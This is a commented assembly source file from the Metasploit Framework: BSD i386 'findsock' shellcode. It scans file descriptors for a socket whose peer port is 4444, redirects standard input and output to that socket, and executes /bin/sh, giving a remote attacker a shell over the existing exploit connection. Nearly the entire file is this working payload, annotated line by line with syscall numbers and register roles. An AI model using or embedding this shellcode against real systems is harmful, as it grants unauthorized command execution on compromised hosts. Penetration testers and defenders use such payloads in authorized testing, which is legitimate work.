GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/bsd/ia32/single_findsock.asm
;
;
; Name: single_findsock
; Qualities: Nothing Special
; Authors: vlad902 <vlad902 [at] gmail.com>
; Version: $Revision: 1846 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; This payload redirects /bin/sh to a socket connected from a
; certain source port.
;
; It walks the process's file descriptors upward from 1, calling
; getpeername(2) on each until one whose peer port matches the
; expected value is found, then dup2(2)s that socket over stdin,
; stdout and stderr and execve(2)s /bin//sh on it.
;
; Target / ABI: BSD, i386, NASM syntax. No absolute addresses are used.
;   The BSD int 0x80 convention applies throughout: the syscall number
;   is in eax and the arguments are read from the stack starting at
;   [esp+4]; the dword at [esp] is a return-address slot the kernel
;   skips, which is why every int 0x80 below is preceded by one extra
;   "dummy" push after the real arguments.
;   Syscall numbers used: 0x1f getpeername, 0x5a dup2, 0x3b execve.
;
; Register roles:
;   edi = descriptor currently being probed (ends as the matched socket)
;   ebp = base of the 16-byte sockaddr_in scratch area on the stack
;   ecx = dup2 target descriptor, counting 2, 1, 0
;
; NOTE(review): the descriptor walk has no upper bound and the
;   getpeername return value is never checked. If no descriptor's peer
;   port matches, the loop spins indefinitely with an ever-increasing
;   edi; on a host this is visible as a process issuing a continuous
;   stream of getpeername calls on ascending descriptor numbers.
;;

BITS 32

section .text
global main

main:
    xor edi, edi                        ; edi = 0; the loop increments before probing, so fd 1 is first
    push edi                            ; dword 0 = start of the sockaddr_in scratch area
    mov ebp, esp                        ; ebp = &sockaddr; the 12 bytes above it are overwritten as buffer

getpeername_loop:
; 32-bit is okay since the connection should be established already.
    inc edi                             ; next descriptor to probe

    mov esp, ebp                        ; drop the previous iteration's pushes so the stack does not grow
    push byte 0x10                      ; addrlen = sizeof(struct sockaddr_in) = 16
    push esp                            ; arg3: &addrlen (address of the dword just pushed)
    push ebp                            ; arg2: struct sockaddr *addr = scratch area
    push edi                            ; arg1: fd
    push byte 0x1f
    pop eax                             ; eax = SYS_getpeername (31) via push/pop: short encoding, no zero byte
    push byte 0x02                      ; dummy return-address slot; the value 2 is reused as the first dup2 target
    int 0x80                            ; getpeername(fd, addr, &addrlen); errors are ignored

    ; sockaddr_in on BSD: sin_len (1), sin_family (1), sin_port (2, network byte
    ; order), sin_addr (4) - so [ebp+2] is the peer's port. The immediate is the
    ; port as it lies in memory: bytes 11 5c = port 0x115c = 4444.
    ; NOTE(review): presumably rewritten by the payload module to the configured
    ; port when the payload is generated - verify against the caller.
    cmp word [ebp + 2], 0x5c11
    jne getpeername_loop                ; no match: try the next descriptor (unbounded, see header)

    pop ecx                             ; ecx = 2, the dummy dword pushed before int 0x80

dup2_loop:
    push ecx                            ; arg2: newfd (2, then 1, then 0)
    push edi                            ; arg1: oldfd = the matched socket
    push byte 0x5a
    pop eax                             ; eax = SYS_dup2 (90)
    push ecx                            ; dummy return-address slot
    int 0x80                            ; dup2(sock, ecx); these pushes are left on the stack
    dec ecx
    jns dup2_loop                       ; repeat while ecx >= 0; exits with ecx = -1

    ; eax now holds the last dup2's return value - 0 (the new descriptor) on
    ; success - which is reused below as the NULL for argv/envp.
    push 0x68732f2f                     ; "//sh"
    push 0x6e69622f                     ; "/bin" -> "/bin//sh"; the 0 dword (ecx = 0) left on the
                                        ; stack by the last dup2 iteration is its NUL terminator

    mov ebx, esp                        ; ebx = path

    push eax                            ; 0: serves as envp (arg3) and as argv[0] = NULL
    push esp                            ; arg2: argv = address of that NULL dword
    push ebx                            ; arg1: path

    mov al, 0x3b                        ; eax = SYS_execve (59); relies on the upper bytes of eax already being 0
    push eax                            ; dummy return-address slot
    int 0x80                            ; execve("/bin//sh", argv, envp); does not return on success